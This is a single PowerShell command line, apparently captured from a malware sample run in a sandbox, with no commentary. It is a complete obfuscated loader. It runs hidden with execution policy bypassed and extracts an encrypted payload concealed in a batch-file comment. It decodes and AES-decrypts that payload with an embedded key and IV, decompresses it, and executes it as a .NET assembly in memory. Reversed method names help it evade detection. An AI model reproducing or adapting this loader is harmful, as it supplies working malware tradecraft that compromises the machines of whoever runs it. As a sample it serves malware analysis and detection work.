"310b3a077e02c52674f6863a1d7beeb34cfef1b115f0a9e048cb1e8fe7cfcbb3.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $_CASH_EpMhA = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\310b3a077e02c52674f6863a1d7beeb34cfef1b115f0a9e048cb1e8fe7cfcbb3.bat').Split([Environment]::NewLine);foreach ($_CASH_XmsgQ in $_CASH_EpMhA) { if ($_CASH_XmsgQ.StartsWith(':: @')) { $_CASH_ZQHrQ = $_CASH_XmsgQ.Substring(4); break; }; };$_CASH_ZQHrQ = [System.Text.RegularExpressions.Regex]::Replace($_CASH_ZQHrQ, '_CASH_', '');$_CASH_SYRjr = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_CASH_ZQHrQ);$_CASH_PvKMs = New-Object System.Security.Cryptography.AesManaged;$_CASH_PvKMs.Mode = [System.Security.Cryptography.CipherMode]::CBC;$_CASH_PvKMs.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$_CASH_PvKMs.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6hNp6znpdVtLRa88u+RJyOIAqy0yV+kZzUW8J2gDR2A=');$_CASH_PvKMs.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yDzuGGfzy2kiH4wwo0D5Gg==');$_CASH_GbaEH = $_CASH_PvKMs.CreateDecryptor();$_CASH_SYRjr = $_CASH_GbaEH.TransformFinalBlock($_CASH_SYRjr, 0, $_CASH_SYRjr.Length);$_CASH_GbaEH.Dispose();$_CASH_PvKMs.Dispose();$_CASH_NifoM = New-Object System.IO.MemoryStream(, $_CASH_SYRjr);$_CASH_AvJfW = New-Object System.IO.MemoryStream;$_CASH_wZAxN = New-Object System.IO.Compression.GZipStream($_CASH_NifoM, [IO.Compression.CompressionMode]::Decompress);$_CASH_wZAxN.CopyTo($_CASH_AvJfW);$_CASH_wZAxN.Dispose();$_CASH_NifoM.Dispose();$_CASH_AvJfW.Dispose();$_CASH_SYRjr = $_CASH_AvJfW.ToArray();$_CASH_VbXeh = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($_CASH_SYRjr);$_CASH_eGoft = $_CASH_VbXeh.EntryPoint;$_CASH_eGoft.Invoke($null, (, [string[]] ('')))